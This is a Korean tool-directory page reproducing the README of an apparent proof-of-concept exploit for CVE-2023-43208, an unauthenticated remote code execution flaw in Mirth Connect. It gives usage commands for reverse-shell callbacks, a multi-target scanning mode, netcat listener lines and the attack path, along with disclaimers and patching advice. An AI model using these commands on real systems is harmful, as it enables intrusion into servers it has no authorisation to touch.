Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PoC-2023-43208 — CVE-2023-43208에 대한 개념 증명 익스플로잇으로, Mirth Connect 4.4.1 이전 버전에 존재하는 원격 코드 실행 취약점입니다. | Kitploit
도구/GitHubGitHub/mkirahmet/poc-2023-43208
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubmkirahmet/poc-2023-43208

PoC-2023-43208

CVE-2023-43208에 대한 개념 증명 익스플로잇으로, Mirth Connect 4.4.1 이전 버전에 존재하는 원격 코드 실행 취약점입니다.

저장소 보기
35개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-43208-EXPLOIT

Mirth Connect 원격 코드 실행 (RCE) 익스플로잇

Python Version Version CVE Lab Use Only

⚠️ 교육 및 실험실 사용 전용 ⚠️

CVE-2023-43208에 대한 개념 증명(PoC) 익스플로잇으로, 버전 4.4.1 이전의 Mirth Connect에서 발생하는 원격 코드 실행 취약점입니다.

🚨 중요 법적 고지

이 도구는 다음 용도로만 엄격히 사용해야 합니다:

  • 🧪 교육 목적
  • 🔬 실험실 환경에서의 승인된 보안 테스트
  • 📚 사이버 보안 연구 및 학습

다음 용도로는 사용하지 마세요:

  • ❌ 소유하지 않은 시스템에 사용
  • ❌ 명시적인 서면 허가 없이 사용
  • ❌ 프로덕션 환경에서 사용
  • ❌ 불법 또는 악의적인 목적으로 사용

모든 관련 법률 및 규정을 준수할 책임은 사용자에게 있습니다. 이 도구를 오용할 경우 형사 처벌을 받을 수 있습니다.

📋 설명

이 익스플로잇은 Mirth Connect의 /api/users 엔드포인트의 XML 역직렬화 취약점을 대상으로 하며, 영향을 받는 버전(< 4.4.1)에서 인증 없이 원격 코드 실행을 허용합니다.

이 취약점은 CRITICAL 등급이며, 반드시 격리된 실험실 환경에서 자신의 시스템으로만 테스트해야 합니다.

🔧 요구 사항

  • Python 3.7 이상
  • requirements.txt에 명시된 필수 패키지
  • 취약한 Mirth Connect 인스턴스가 있는 실험실 환경

🚀 설치

Clone the repository

git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT

Install requirements

pip install -r requirements.txt 💻 사용법 (실험실 전용)

대화형 모드 (실험실 권장) bash python exploit.py 명령줄 모드 bash

Single target exploitation (LAB USE ONLY)

python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444

Scan multiple targets from file (LAB USE ONLY)

python exploit.py -f targets.txt -t 50 -o vulnerable.txt

Non-interactive mode (LAB USE ONLY)

python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive 옵션 text -u, --url Target URL to exploit (LAB USE ONLY) -lh, --lhost Listening host (your IP) -lp, --lport Listening port -f, --file File containing target URLs to scan -o, --output Output file for saving scan results -t, --threads Number of threads for scanning (default: 50) --no-interactive Run in non-interactive mode 🎯 실험실 환경 예시

실험실을 설정하세요:

  • 격리된 VM에 취약한 Mirth Connect 버전(< 4.4.1) 설치
  • 통제된 네트워크 사용 (예: VirtualBox/VMware의 NAT/Host-only)
  • 인터넷에 노출 금지

리스너를 시작하세요:

ncat -lnvp 4444

or

nc -lnvp 4444 실험실에서 익스플로잇을 실행하세요:

python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444 🧪 테스트 환경 요구 사항

  • 격리된 네트워크/VLAN
  • 가상 머신만 사용
  • 프로덕션 데이터 없음
  • 외부 액세스를 차단하는 방화벽 규칙
  • 적절한 승인 문서화

📝 기술 세부 사항

취약점 유형: XML 역직렬화 RCE

영향을 받는 버전: Mirth Connect < 4.4.1

수정 버전: 4.4.1 이상

CVSS 점수: 9.8 (Critical)

공격 경로: 네트워크

인증: 필요 없음

이 익스플로잇은 Commons Collections 가젯을 사용하여 /api/users 엔드포인트를 통해 RCE를 달성합니다.

🛡️ 보호 조치

Mirth Connect를 실행 중인 경우:

✅ 버전 4.4.1 이상으로 업데이트

✅ 관리 인터페이스에 대한 네트워크 액세스 제한

✅ 적절한 인증 구현

✅ 의심스러운 XML 페이로드 모니터링

👥 크레딧

원저자: K3ysTr0K3R & Chocapikk

수정: M0h4

CVE: CVE-2023-43208

⚠️ 최종 경고

╔══════════════════════════════════════════════════════════════╗ ║ 이 도구는 실험실 전용입니다 ║ ║ 무단 사용은 불법이며 비윤리적입니다 ║ ║ 모든 위험과 책임은 사용자에게 있습니다 ║ ║ 저자는 오용에 대한 책임을 지지 않습니다 ║ ╚══════════════════════════════════════════════════════════════╝

도구 다운로드